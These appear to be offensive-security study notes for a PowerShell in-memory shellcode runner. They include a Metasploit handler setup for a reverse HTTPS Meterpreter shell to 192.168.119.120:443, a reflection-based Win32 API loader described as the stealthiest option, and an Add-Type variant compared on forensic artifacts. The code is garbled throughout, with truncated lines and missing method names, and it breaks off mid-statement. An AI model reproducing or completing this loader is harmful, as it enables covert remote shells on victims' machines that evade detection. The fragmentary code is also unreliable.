Powershell In-memory Shellcode Runner
shellcode to embed in .ps1:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
Reflection Shellcode Runner without (stealthiest)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
$tmp=@()
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.()
}
Directly Calling Win32 API with .NET (less stealth)
Add-Type uses the .NET Framework to compile the C# code containing the Win32 API declarations, leaving a temporary .cs source file on disk (a forensic artifact the reflection-based approach above avoids).
$Kernel32 =
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32")]
[DllImport("kernel32", CharSet=CharSet.Ansi)]
[DllImport("kernel32.dll", SetLastError=true)]
UInt32 dwMilliseconds);
}
$Kernel32
$size = $buf.Length
[